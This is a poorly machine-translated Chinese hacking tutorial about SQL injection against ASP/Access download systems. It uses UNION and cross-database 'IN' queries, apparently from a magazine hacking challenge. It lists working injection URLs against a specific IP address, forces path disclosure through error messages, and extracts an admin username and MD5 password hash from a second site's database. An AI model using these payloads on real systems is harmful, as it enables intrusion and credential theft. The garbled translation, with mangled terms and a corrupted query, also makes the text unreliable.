This article issued a black defense 12 period and one of the following, didn't get money, don't send it! ! ! Access's inter-library query
Text / superhei 04-7-28
Everyone still remembers the MSSQL's cross-library query, in fact, in Access, you can also implement cross-queries between 2 data. Below I will introduce you to Access's cross-library query.
Let us first look at how to realize the MDB file in Access, we casually create an empty database, query the contents of the admin list in the database D: /Daos/db/daidalos.mdb: SQL statement is SELECT * from admin in "d: /daos/db/daidalos.mdb"
After the query, successfully returns the contents of the object database in the target database:
In actual ASP injection, you should make two select at the same time. If you are familiar with PHP MySQL injection, it should be easy to think of the joint query using Union. We can use it in Access, there is still a benefit using UNION query. Go to the data for a character to guess, but you can directly fade in the field like MySQL PHP (the specific MIX has written a detailed article). From the above, you can see that you must implement the following 2 conditions below:
1. Use the Union query Must know the number of fields in the previous SELECT
2. You must know the target 3. The location of the database, 4. Absolute path.
Condition 1 We can manually deal with the prompt error message, or you can automatically be implemented.
Condition 2 This is a difficult point, but we can be implemented by using the "Access Exposition". Some people will say that they can know the data location, that is not directly loaded, in fact, the current database generally prevents downloading, some are not Web Under contents.
The first level in the black defense fourth round, is the set of 2 ASP Access download systems, one is the rainpoint download system, one is the throne download system. After testing the pirate download system, you can have a database but don't let the download, it seems that there is no place to be injectable, and the rain download system is a vulnerability, the database can be felt and can be downloaded directly, and can also be injected. However, the background of the rain is very simple, there is no place to use, our goal is put on the password password of the throne, and I will give you a demonstration of the throne system through the rain point system. Get the background password of the throne:
We learned that list.asp of the rainpoint system can be injected, let's get the number of data table fields in UNION, submit:
<
http://219.237.81.46/yddown/list.asp?id=75 Union Select 1 From USERINFO>
return:
Microsoft Jet Database Engine Error '80040e14'
The number of columns in the two data sheets or queries selected in the joint query do not match.
/yddown/list.asp, line?
The field is not right, I wrote a perl script to automatically guess, after the code is seen)
When we submit:
<
http://219.237.81.46/yddown/list.asp?id=75 Union Select 1, 2, 3% 20From USERINFO>
No error, return,
Haha! We have obtained the number of fields, and we can get my location in the field 1, you can display the data we query. Now there is still a problem with the database, simple us, submit:
<
http://219.237.81.46/dsdown\regs.asp>
Success return path:
Microsoft Jet Database Engine Error '80004005'
'D: /111/db/kljdsld.asa' is not an effective path. Determine if the path name spell is correct, and whether it is connected to the server stored.
/DSDOWNDB/USER.ASP, line
(Note: The path that is not necessarily "complete", the real path is: D: /111/dsdown/db/kljdsld.asa)
Below we have across the library, construct the URL as follows:
<
http://219.237.81.46/yddown/list.asp?id=75 Union Select Admin, 3, 2% 20From Admin IN "d:/11/dsdown/db/kljdsld.asa"% 20where% 20ID = 1>
The above statement is, UNION query data D: /111/db/kljdsld.asa in the field of the field of id = 1 in the object, if successful will directly anticipate the username:
We get the user name as admin We will follow the vicious code:
<
http://219.237.81.46/yddow/list.asp?id=75 Union Select PWS, 3, 2% 20From ADMIN 1140"d:/111/dsdown/db/kljdsld.asa"% 20where% 20ID = 1>
Figure:
Get a password 32-bit MD5 encrypted haveh; 77E6CBB3F9468EADB655AE6826357922
Our cross-library query is successful, here I just demonstrate the cross-library query, there is no need to manage the black defense:).
summary:
This article mainly introduces you to two very useful methods. 1st we have to get a character in ASP, it is very troublesome, and it is very troublesome, and directly uses Union alternative data to exfolio data. It is not a Chinese or special characters, you can go in one step. The second is a cross-library, which is very flexible, you can make you infiltrate, you can't think about harvest.
